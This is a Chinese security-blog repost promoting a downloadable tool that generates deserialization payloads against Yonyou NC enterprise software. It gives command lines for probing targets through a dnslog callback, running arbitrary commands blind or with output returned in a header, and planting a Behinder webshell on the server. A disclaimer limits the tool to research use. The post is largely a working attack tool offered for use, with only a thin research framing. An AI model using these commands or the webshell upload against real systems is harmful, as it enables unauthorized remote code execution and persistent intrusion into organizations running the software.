NC反序列化漏洞payload生成

admin 2022年9月10日14:22:51评论128 views字数 978阅读3分15秒阅读模式

项目作者:Ghost2097221

项目地址:https://github.com/Ghost2097221/YongyouNC-Unserialize-Tools


0x01 前言

无回显的构造链直接使用的是 CC6执行命令,回显的构造链使用了DefiningClassLoader来绕过默认的黑名单,然后结合 CC6构造链进行任意代码执行。搭配了接口检测功能和URLDNS构造链判断是否存在反序列化。


0x02 接口检查功能

java -jar nc6.5.jar http://127.0.0.1 Check

NC反序列化漏洞payload生成


0x03 URLDNS构造链探测

java -jar nc6.5.jar http://127.0.0.1 urldns http://123.dnslog.cn

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

0x04 无回显命令执行

java -jar yonyouNCTools.jar http://192.168.222.130 blind calc.exe

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

0x05 回显命令执行

java -jar yonyouNCTools.jar http://192.168.222.130 Execute,通过 Header头传递命令。

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

0x06 落地 webshell

java -jar yonyouNCTools.jar http://192.168.222.130 UploadShell "C:UsersAdministratorPicturesCamera Roll1.jsp"

此处如果使用 java1.8运行,固定落地一个天蝎的 webshell,路径为:http://127.0.0.1/eozZEwBb.jsp,如果使用的是 java1.7运行,会重新动态编译,可以落地自定义的 webshell,路径随机。

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

NC反序列化漏洞payload生成

0x07 下载地址

1、通过项目地址下载

2、关注web安全工具库公众号,后台回复:20220910


0x04 声明

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。


推 荐 阅 读




加我微信:ivu123ivu,进送书活动群,不定时免费送书


《Python深度学习从零开始学》

NC反序列化漏洞payload生成

本书以通俗易懂的方式详细介绍深度学习的基础理论及其相关知识,同时提供图像识别、情感分析、迁移学习、人脸识别、图像风格迁移、生成对抗网络等案例引导读者入门深度学习。

原文始发于微信公众号(web安全工具库):NC反序列化漏洞payload生成

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月10日14:22:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NC反序列化漏洞payload生成http://cn-sec.com/archives/1290149.html

发表评论

匿名网友 填写信息